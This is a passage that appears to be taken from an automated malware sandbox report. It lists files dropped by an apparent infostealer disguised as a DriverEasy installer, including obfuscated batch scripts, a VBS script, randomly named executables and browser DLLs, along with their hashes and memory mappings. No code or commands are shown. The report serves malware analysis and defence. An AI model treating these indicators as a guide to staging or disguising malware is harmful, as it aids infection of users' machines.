SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\ControlSet001_obf.bat
Filesize
71KB

MD5
85683ccbdd6d1a89ee8fae20d364928b

SHA1
77af8e1a3102958106fa620e7795109b1e135aa2

SHA256
fbe63b3379637817de60c8db5392a75c2f5731f4a864f8bfb1f68b4eb20ac7d6

SHA512
2b974b64b0f7154390b730e265e58f6bb7d239e8ce62f3e64453c1d0b3119643fde00d2a2d1cf3b234905ab7687f2207d48c1cf8c1b033a745956f1cd3670877

Download Submit
C:\ProgramData\SurfaceReduction\ControlSet002.bat
Filesize
186B

MD5
d62adedd663f3bc437e8c234bd818fe8

SHA1
785984b360807df58434723f588a5dfc94b5e7a1

SHA256
6cbc7c7a5ca124d27f3bf0f407fe8e1af5009313cb2f31c6de320b2549857333

SHA512
4b1dc05aee7621570466aadf4bdc0b866fa0e386615eae92a4b382af83c35c6af97276eab6a4f7a51a783dbfb4b61cf3139eb007080f3a13a13a3260e75227ea

Download Submit
C:\ProgramData\SurfaceReduction\ControlSet003.vbs
Filesize
6KB

MD5
4b47d820e1ba7ea36ca0ddebda829ab3

SHA1
c5a018b519a3892cfd262198c04584d909af809c

SHA256
4d770c50ff8d5aa91acf39abf462ff30ecb83e5b2ffc4bb03f356ecde2f516b9

SHA512
29edeab802d7befce1c2135b541c379ab440335efde1e8417fc2498705ee06cffd8b9d0b350d095665995667310cd2838ccf698ca9c13e462e26ae483d091216

Download Submit
C:\ProgramData\SurfaceReduction\compil32_obf.bat
Filesize
489B

MD5
b54cbf7c62f1e361ae96b81baa4e87ae

SHA1
4e0f00598b8c3a202e937c95416a563b5856097f

SHA256
70731b66dbafc1ed5711b8de3b844f1a125ff418f111a2d5d427de2468859b04

SHA512
ae3504ad108af7b9865a47aeeb86501a9c43bc800ea88bc9b67d8484390445951e0e6285b8287d6bd0f377399505e0e6348f22cb417eba0d9c0ed86dcc3188aa

Download Submit
C:\ProgramData\SurfaceReduction\extracted\ANTIAV~1.DAT
Filesize
2.1MB

MD5
cab14b0bbfb0784debbe9c31d60bf8ed

SHA1
d74032b34189e9d022d47fb9191e9d6ff8679d70

SHA256
5906d4ec6168ece1f7873ad067a4f30999f298142d0e7d217c16aac8a9386147

SHA512
a4323f8e0ab813bbf42e28e299d3e564c1bddf52ab1dff61b20e316ba1df5f6e9f7c17653e103daa03dbaa0a43dbf4a5bcdfbfd746c7716927f100bc30ef36a7

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_1.zip
Filesize
1.2MB

MD5
37a9fc03362d4e2a91028ea12d5440ea

SHA1
539477312c35364d485f76b641d89b66c702def5

SHA256
012a4528bb6b9dde780d627a0f22b440ff26fac4a80ebc91266a7cc95f324d4b

SHA512
49ac51db69e4201b8c8af206dd35b62b448a7c713cbf564266e98d29953b5a8673202331c663da6b7bc241a1435a23f06bf477e1546f8b9f79070aea66c51b52

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_10.zip
Filesize
1.2MB

MD5
865d5a4cb771be6ae6f505914b1c56a7

SHA1
1291cee5a90c9d9690ce059e3c49bc6b7621f44b

SHA256
4d4d200ac10878dddc42f1daa30284c75d3653a99d035141c05b73f237316cb9

SHA512
c5751d2e791cbd03e6650f980cc1c1de6479407181b75ae88ade129976a68758273e7d57ccea0cd370055bc4892de850c2995985ac8263446912d1b83d97dc25

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_11.zip
Filesize
2.7MB

MD5
cbbe72d0fa7d9c739fc5158d358dde6c

SHA1
22254b0390497f56229cfb743c12de4b434c1637

SHA256
b409ec09d8ab5d68a57894ab4a7f7b652ad708b44a7f06d0628badb52962db84

SHA512
18e6a2daac396ee311f87a2a2fa41557bac2924894bd25cfa8e4c4f0ed0e31e11cf779a0abedd0fa620325417eb6797d89bfa7f8114ac6f7b839ff8c5a4e7401

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_2.zip
Filesize
1.2MB

MD5
1ee352888327b22d5d1322921869ec32

SHA1
a1cfa55dbd550322e034aa2a55d2ded386b4ae85

SHA256
5fb813ace4842f2a963690d4fb72de77c25e565ad472cae29abf76fad6ee65bf

SHA512
b699dcc3b1566468fc0fd39875a0562439c5a85e96eb6f864301e4b46f90cffe3c88901c587aa23bd7cd879ec490ca44ee42d137580a695c50e1a5b1ca64d43e

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_3.zip
Filesize
1.2MB

MD5
f2190398337be5a94363704eeebbcc5f

SHA1
6a807dd4ef24450c8df2957665edcb87aef1cdd1

SHA256
413e062e7cee0417b6f6e5c6d461966f3fd909b163919e5a832bea791d2d2c1d

SHA512
22671862dcb57cfb9753a0ae54b955a57df35e5119da08b9143896bce2fa6132c1e629fa2888b97c97dc9f4a481f23b9db3604f2447440c1f1bbd4071f3bf6dd

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_4.zip
Filesize
1.2MB

MD5
92ea3f0f8ecbf9ae630c1809a3d63e88

SHA1
f74821b0d60260628406acadd753c26cbbadf875

SHA256
3d54b4a81c569fe86d0efa62f565990dc1b2828abed199e5edea5d96606c4292

SHA512
fa02db5f7821b675254c668852e255c810f6be1eefa68901fbfbeac26093fd88b55278f108ce9b7e8ccebf3f3b68fe70f69abd0f7b9ac38425fd07d463ea9574

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_5.zip
Filesize
1.2MB

MD5
c286dca42d0bf0e3225c3d7648ec4567

SHA1
ff311804e8d3b52c6b3b119a116e500cf99cda46

SHA256
fa189a2220197006912e130748b24f2ea8d26b7a69d6146e7aa2b166d7a4d779

SHA512
1e9e8deb7e6d3407212fead035208fd6c6932c3573f5c5b90f8c01b7bcc52452f6e0108e6021133ca602ef8caa89b6986e58d50bc031687360fceaa81990a297

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_6.zip
Filesize
1.2MB

MD5
731a2f00f2d78c1403fe1f6da91f74f8

SHA1
c8ac81210b1c36f7754a6425047a518234128d71

SHA256
af668686a95132cea701ee765c0be014a48df2f3bff2d5c1184f9101dcd1ecf3

SHA512
89231305cebbc9c44479b0bea5314e7ed7d1144b495b0b526f8e1a1179ca3535f02c0cd1953d5583fa6edf5a1da795568162d1eecb8efa8a2b5fbc78c5ddcb07

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_7.zip
Filesize
1.2MB

MD5
2de49fba88e2c22beb7d786775c00a34

SHA1
2435d25e6b38816d432d60dd9867340fffeac331

SHA256
ee718c48eb62f9815768f877f2ae0a103762476945dec3feb25caaab3eed42fe

SHA512
531d7ada30f31ad6ddb3c934e08d78db205e1c7ee5cba5772726fd76311f289432f6e15a935fb6e4f2b4bd5ea236d91c3be8ef3d4a94c7211d95472b9fe8c553

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_8.zip
Filesize
1.2MB

MD5
6fe82c7d0b0b57b2625dc3b176c17ab2

SHA1
1088935bb4fab111b74ef23d08c071a0f2359cf8

SHA256
e5cf8bf99bf9b93ebed147ac3395eb77bd2a930ae2a2ea9c4d0a55e9a962b1c3

SHA512
f2339e8814cc2bccb5d75d98329b748784c8ccc1d029a2c9b7efa6e9589bf08035b3ca41c2833805f3bdeef22bd8b4af84215d471eee60a9a056ec01f9db95a2

Download Submit
C:\ProgramData\SurfaceReduction\extracted\file_9.zip
Filesize
1.2MB

MD5
8a4ee10b00b421ea3cba409a09bb8dfb

SHA1
e355cdad9903f0515eb45391b3f9d62ae8b19d14

SHA256
da5f3fbab9bd97eec3ff94eddfa7eeec6d9752ca06e2f69a91a41eff69f7943f

SHA512
1831003590f866808bb5f7ee94aa78239cf569f10792bb69e78b7e7629735009790742bea153336c421633c139ba0b8d8b8b8d493047b30d4a63fd3bc7e6d27d

Download Submit
C:\ProgramData\SurfaceReduction\extracted\lrPBx4qjVQLL.exe
Filesize
1.5MB

MD5
018dbebc18d0989b6c5a0916a7aeb8ee

SHA1
3d9d22ef47c09230fda8d66945e00e3538f2d975

SHA256
82112a8c76d6bab37acadc1e1a113e43b6dc966f48b9f2a0cc8fdbd844ee2f7a

SHA512
a97b649deaed7f44b03f882648dbaa26ebddc9d925e161d6b523a09861950efef17cb14339f22a92184ca9184abb92b04e2d4f07a7914ae0e091f4f2560adf96

Download Submit
C:\ProgramData\SurfaceReduction\file.bin
Filesize
2.7MB

MD5
50f2695f0630c064cc5aef89457258a4

SHA1
8b3bb3cb8571d2e675d8464044f4f1d465a7311d

SHA256
0ed5dec3371f14dd7afe6b537ff2205a0109ecdb965ff24b65b1245bf6a88090

SHA512
36fa74393482848f18c719a66dba256408aa9a4be94fdf9c85b699186eaa8d227617c889cb92f3062d830569067c8559ccd6f3b51c0c11508ebd4a9a79871894

Download Submit
C:\ProgramData\SurfaceReduction\hfile.bin
Filesize
2.7MB

MD5
a875e51c69140cf48b25d6cd3a42e5d7

SHA1
69b95f4753254b2998037dd336a9f973876bb5fc

SHA256
840434f1f0c9094901d850341ac3766a3ec0a3d45b44cffadbe42b05924d9054

SHA512
03cfa8865f6895f3f1bd7b18e0aa599d01bec683b953f10349f584e5986b4c01f2bebbe89263c99e9433529c983b3b78de2a35a20fd3f02ab5e9098dd5c71816

Download Submit
C:\ProgramData\SurfaceReduction\lrPBx4qjVQLL.exe
Filesize
1.5MB

MD5
018dbebc18d0989b6c5a0916a7aeb8ee

SHA1
3d9d22ef47c09230fda8d66945e00e3538f2d975

SHA256
82112a8c76d6bab37acadc1e1a113e43b6dc966f48b9f2a0cc8fdbd844ee2f7a

SHA512
a97b649deaed7f44b03f882648dbaa26ebddc9d925e161d6b523a09861950efef17cb14339f22a92184ca9184abb92b04e2d4f07a7914ae0e091f4f2560adf96

Download Submit
C:\ProgramData\SurfaceReduction\main.bat
Filesize
397B

MD5
64e4a3acc6321c0922189168e35c2c3d

SHA1
e8ca3583870be25ac3a91d6fc51c11d49463cd5d

SHA256
307b5ac5ac7ae6ce433dcad2ee72fa2aa4ce9e2283f1093eaedfc96edf670ca2

SHA512
fe9907be249df93940af4592d787fa8cd597453796902b11605485ea16848e566c2542de696b74da7e73f93b67b9660980a39e67a567fcc19f1453e21583f99f

Download Submit
C:\Users\Admin\AppData\LocalLow\mozglue.dll
Filesize
612KB

MD5
f07d9977430e762b563eaadc2b94bbfa

SHA1
da0a05b2b8d269fb73558dfcf0ed5c167f6d3877

SHA256
4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862

SHA512
6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

Download Submit
C:\Users\Admin\AppData\LocalLow\nss3.dll
Filesize
1.9MB

MD5
f67d08e8c02574cbc2f1122c53bfb976

SHA1
6522992957e7e4d074947cad63189f308a80fcf2

SHA256
c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e

SHA512
2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

Download Submit
C:\Users\Admin\AppData\LocalLow\sqlite3.dll
Filesize
1.0MB

MD5
dbf4f8dcefb8056dc6bae4b67ff810ce

SHA1
bbac1dd8a07c6069415c04b62747d794736d0689

SHA256
47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68

SHA512
b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
4280e36a29fa31c01e4d8b2ba726a0d8

SHA1
c485c2c9ce0a99747b18d899b71dfa9a64dabe32

SHA256
e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

SHA512
494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
5d5ec373ca259280cba2ab0a422f0e3c

SHA1
3252c7b47eb5a4e1716f984c1d8d5cff4ccecbc4

SHA256
a2f3ab712e83863c61e8c3541cdf239e77d80915b70764b5a69397a6a0fa86c8

SHA512
239a11bc7c37505124bc56f6879f9c4ca4ea96f6fb252dc8ef97ad09ae907bf01b3d6d24b5d3496e1e7c3f468eb3f0ae4ab76173ef3c54241e208e9ed8d7a35e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
0a36748276794f360b53198ecffea825

SHA1
5ab69513b1b81ab61f23dfa5f5d3703afb235460

SHA256
98ed7acd02f9bf68899f60ba5c556bfe3d64ab96888355c7317c64075f73dfa1

SHA512
ca02d9ab8bd574b786937477e9011a8838cd156057882365e633b9b7e4472c86262ad124dbe1c0353789ac23d64b3b64521bf9b8d0742eaa696c97837d9b92d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\56FGxFdp.exe
Filesize
16.6MB

MD5
4d12325765be0951b3d05237dd68b3f8

SHA1
6e3280fa3953ac2b42c9f2002b0a8188c2742f25

SHA256
a8ef7985e7e029c6f66dd8571568d053c1a65b5d493553bb20fae8846a7ae2e4

SHA512
d0351cc8e8875a95473cabf40e58fc1fb7ffb94ddf124fafb400e0b7dda1377a9996a7d516026b437de9e4acff869ae29252949a71dee324727c073ed651b2f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\56FGxFdp.exe
Filesize
16.6MB

MD5
4d12325765be0951b3d05237dd68b3f8

SHA1
6e3280fa3953ac2b42c9f2002b0a8188c2742f25

SHA256
a8ef7985e7e029c6f66dd8571568d053c1a65b5d493553bb20fae8846a7ae2e4

SHA512
d0351cc8e8875a95473cabf40e58fc1fb7ffb94ddf124fafb400e0b7dda1377a9996a7d516026b437de9e4acff869ae29252949a71dee324727c073ed651b2f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-7C6M9.tmp\DriverEasy.5.7.3.tmp
Filesize
1.1MB

MD5
bf61f7e7761c80a27b13f82014f5687b

SHA1
1894fac2a9e8adcfb74a864e92155f9a4506a9d5

SHA256
26f877e0e715507e37f2ca323e0e5897d4246478ee55b8b779eb0b4e92ef7244

SHA512
df0dc8a6db13218b4a4e1c47b13f791d10fff5649d0fda5bf40636a22128abd83d57a7dd695e8cd4ddb0e09d050eff033eaa2aa242fa7e1b20cf61f36e49b54a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-DCJFS.tmp\b2p.dll
Filesize
22KB

MD5
ab35386487b343e3e82dbd2671ff9dab

SHA1
03591d07aea3309b631a7d3a6e20a92653e199b8

SHA256
c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

SHA512
b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-DCJFS.tmp\botva2.dll
Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-DCJFS.tmp\botva2.dll
Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-DCJFS.tmp\iswin7logo.dll
Filesize
39KB

MD5
1ea948aad25ddd347d9b80bef6df9779

SHA1
0be971e67a6c3b1297e572d97c14f74b05dafed3

SHA256
30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

SHA512
f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-P0NBS.tmp\e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
Filesize
3.1MB

MD5
fd99abd9170a55136517f4c93c5afbf9

SHA1
f1aa4171e82b8ddd66e2b8c7ade40a27397a9e4d

SHA256
0a4b31893f11ed266df9e3d740be1b53fb0345c11903317eb13c254628fa9b77

SHA512
5256302bbbb3639fcb14b9ea8653df0830e16a3feb3b0cc2ea09ac648c3dc11c1a66f1f4cbcf36f60fa4170b7c27cd002abac2c20c5d4b917a80b54f20cc2b64

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-UP9TI.tmp\DriverEasy.5.7.3.exe
Filesize
4.0MB

MD5
af59aa7c463b1bcfdf52fc356beb7602

SHA1
0329261c4764f41b88bb2ff89fbab886d747a21f

SHA256
1e7ad3c0528b4e11b7b3f9b31e4321471f746cd722034aa2bf7d10ebb51100df

SHA512
9ed8eb2d9b596916334c303ca2c1cb2d200cad4305fd294f15f83bf815c6b2b7840beb2027bd0e264ecd394728f9a1a2b75a3b9553caaf1ce89c70756e0f0987

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-UP9TI.tmp\DriverEasy.5.7.3.exe
Filesize
4.0MB

MD5
af59aa7c463b1bcfdf52fc356beb7602

SHA1
0329261c4764f41b88bb2ff89fbab886d747a21f

SHA256
1e7ad3c0528b4e11b7b3f9b31e4321471f746cd722034aa2bf7d10ebb51100df

SHA512
9ed8eb2d9b596916334c303ca2c1cb2d200cad4305fd294f15f83bf815c6b2b7840beb2027bd0e264ecd394728f9a1a2b75a3b9553caaf1ce89c70756e0f0987

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-UP9TI.tmp\_isetup\_iscrypt.dll
Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Roaming\NqrLZCvW.exe
Filesize
519KB

MD5
0cc25540c7ea712231dfaa165733b316

SHA1
2c4398ac4c7e4ea2605a7f9cd96b8c15db743e35

SHA256
166af3429b6d9a81fbb537849190190516596c0c4a44be03728a408003039d82

SHA512
34d25b55546e242e5940ee7c891fb37b2ad257a06b91d87e56e47385495ec45386accfb91d405cedd673b4507ede392b3533b1a218a94e90adcfcf432c697eb4

Download Submit
C:\Users\Admin\AppData\Roaming\NqrLZCvW.exe
Filesize
519KB

MD5
0cc25540c7ea712231dfaa165733b316

SHA1
2c4398ac4c7e4ea2605a7f9cd96b8c15db743e35

SHA256
166af3429b6d9a81fbb537849190190516596c0c4a44be03728a408003039d82

SHA512
34d25b55546e242e5940ee7c891fb37b2ad257a06b91d87e56e47385495ec45386accfb91d405cedd673b4507ede392b3533b1a218a94e90adcfcf432c697eb4

Download Submit
C:\Users\Admin\AppData\Roaming\NqrLZCvW.exe
Filesize
519KB

MD5
0cc25540c7ea712231dfaa165733b316

SHA1
2c4398ac4c7e4ea2605a7f9cd96b8c15db743e35

SHA256
166af3429b6d9a81fbb537849190190516596c0c4a44be03728a408003039d82

SHA512
34d25b55546e242e5940ee7c891fb37b2ad257a06b91d87e56e47385495ec45386accfb91d405cedd673b4507ede392b3533b1a218a94e90adcfcf432c697eb4

Download Submit
C:\Users\Admin\AppData\Roaming\gs0f84bl.exe
Filesize
1.9MB

MD5
5986aff76e7813045b1b130efbb10d30

SHA1
62b1f733fe7ed0c0230c20dae3c4a65ecb28e180

SHA256
7dd44d3b3df4f14474d20ffa23e2fb20dcf22ed3a1458b345a1bd85563ac4a62

SHA512
bfa2cad2bbbb61af7dbd22818db048ddaf68e2e22d1c55d80450a7a0c4c31c09bf596f04ebc2a7f55ac70c294ae01d3e8987af4d0bbb60c63662d21c008b3115

Download Submit
C:\Users\Admin\AppData\Roaming\gs0f84bl.exe
Filesize
1.9MB

MD5
5986aff76e7813045b1b130efbb10d30

SHA1
62b1f733fe7ed0c0230c20dae3c4a65ecb28e180

SHA256
7dd44d3b3df4f14474d20ffa23e2fb20dcf22ed3a1458b345a1bd85563ac4a62

SHA512
bfa2cad2bbbb61af7dbd22818db048ddaf68e2e22d1c55d80450a7a0c4c31c09bf596f04ebc2a7f55ac70c294ae01d3e8987af4d0bbb60c63662d21c008b3115

Download Submit
memory/220-252-0x0000000000000000-mapping.dmp

Download
memory/372-143-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/372-141-0x0000000000000000-mapping.dmp

Download
memory/372-149-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/372-174-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/392-196-0x0000000000000000-mapping.dmp

Download
memory/624-214-0x0000000000000000-mapping.dmp

Download
memory/712-291-0x00000000050C0000-0x0000000005152000-memory.dmp

Filesize
584KB

Download
memory/712-289-0x0000000004F80000-0x000000000501C000-memory.dmp

Filesize
624KB

Download
memory/712-285-0x0000000000000000-mapping.dmp

Download
memory/712-288-0x0000000000E70000-0x0000000000EF4000-memory.dmp

Filesize
528KB

Download
memory/712-293-0x0000000006470000-0x000000000647A000-memory.dmp

Filesize
40KB

Download
memory/712-290-0x00000000055D0000-0x0000000005B74000-memory.dmp

Filesize
5.6MB

Download
memory/712-184-0x0000000000000000-mapping.dmp

Download
memory/840-187-0x0000000000000000-mapping.dmp

Download
memory/880-240-0x0000000000000000-mapping.dmp

Download
memory/908-246-0x0000000000000000-mapping.dmp

Download
memory/1016-306-0x0000000000000000-mapping.dmp

Download
memory/1160-183-0x0000000000000000-mapping.dmp

Download
memory/1428-268-0x0000000000000000-mapping.dmp

Download
memory/1456-225-0x0000000000000000-mapping.dmp

Download
memory/1476-280-0x0000000073630000-0x000000007364B000-memory.dmp

Filesize
108KB

Download
memory/1476-146-0x0000000000000000-mapping.dmp

Download
memory/1476-156-0x00000000072A0000-0x00000000072AF000-memory.dmp

Filesize
60KB

Download
memory/1476-159-0x0000000002230000-0x0000000002233000-memory.dmp

Filesize
12KB

Download
memory/1476-158-0x0000000073630000-0x000000007364B000-memory.dmp

Filesize
108KB

Download
memory/1476-160-0x0000000072B10000-0x0000000072B21000-memory.dmp

Filesize
68KB

Download
memory/1480-243-0x0000000000000000-mapping.dmp

Download
memory/1508-181-0x0000000000000000-mapping.dmp

Download
memory/1528-190-0x0000000000000000-mapping.dmp

Download
memory/1592-202-0x0000000006840000-0x0000000006872000-memory.dmp

Filesize
200KB

Download
memory/1592-298-0x0000000000000000-mapping.dmp

Download
memory/1592-209-0x00000000077C0000-0x00000000077C8000-memory.dmp

Filesize
32KB

Download
memory/1592-208-0x00000000077D0000-0x00000000077EA000-memory.dmp

Filesize
104KB

Download
memory/1592-207-0x00000000060D0000-0x00000000060DE000-memory.dmp

Filesize
56KB

Download
memory/1592-206-0x0000000007830000-0x00000000078C6000-memory.dmp

Filesize
600KB

Download
memory/1592-203-0x000000006F300000-0x000000006F34C000-memory.dmp

Filesize
304KB

Download
memory/1592-204-0x0000000006820000-0x000000000683E000-memory.dmp

Filesize
120KB

Download
memory/1592-205-0x00000000075F0000-0x00000000075FA000-memory.dmp

Filesize
40KB

Download
memory/1592-199-0x0000000000000000-mapping.dmp

Download
memory/1692-185-0x0000000000000000-mapping.dmp

Download
memory/1724-232-0x0000000000000000-mapping.dmp

Download
memory/1732-137-0x0000000000000000-mapping.dmp

Download
memory/1736-217-0x0000000000000000-mapping.dmp

Download
memory/1892-194-0x0000000000000000-mapping.dmp

Download
memory/2036-249-0x0000000000000000-mapping.dmp

Download
memory/2096-236-0x0000000000000000-mapping.dmp

Download
memory/2240-176-0x0000000000000000-mapping.dmp

Download
memory/2440-180-0x0000000000000000-mapping.dmp

Download
memory/2460-179-0x0000000000000000-mapping.dmp

Download
memory/2488-165-0x0000000000400000-0x00000000004FA000-memory.dmp

Filesize
1000KB

Download
memory/2488-140-0x0000000000400000-0x00000000004FA000-memory.dmp

Filesize
1000KB

Download
memory/2488-135-0x0000000000400000-0x00000000004FA000-memory.dmp

Filesize
1000KB

Download
memory/2720-239-0x0000000000000000-mapping.dmp

Download
memory/2908-189-0x0000000000000000-mapping.dmp

Download
memory/2956-295-0x0000000002B66000-0x0000000002CE5000-memory.dmp

Filesize
1.5MB

Download
memory/2956-297-0x0000000002B66000-0x0000000002CE5000-memory.dmp

Filesize
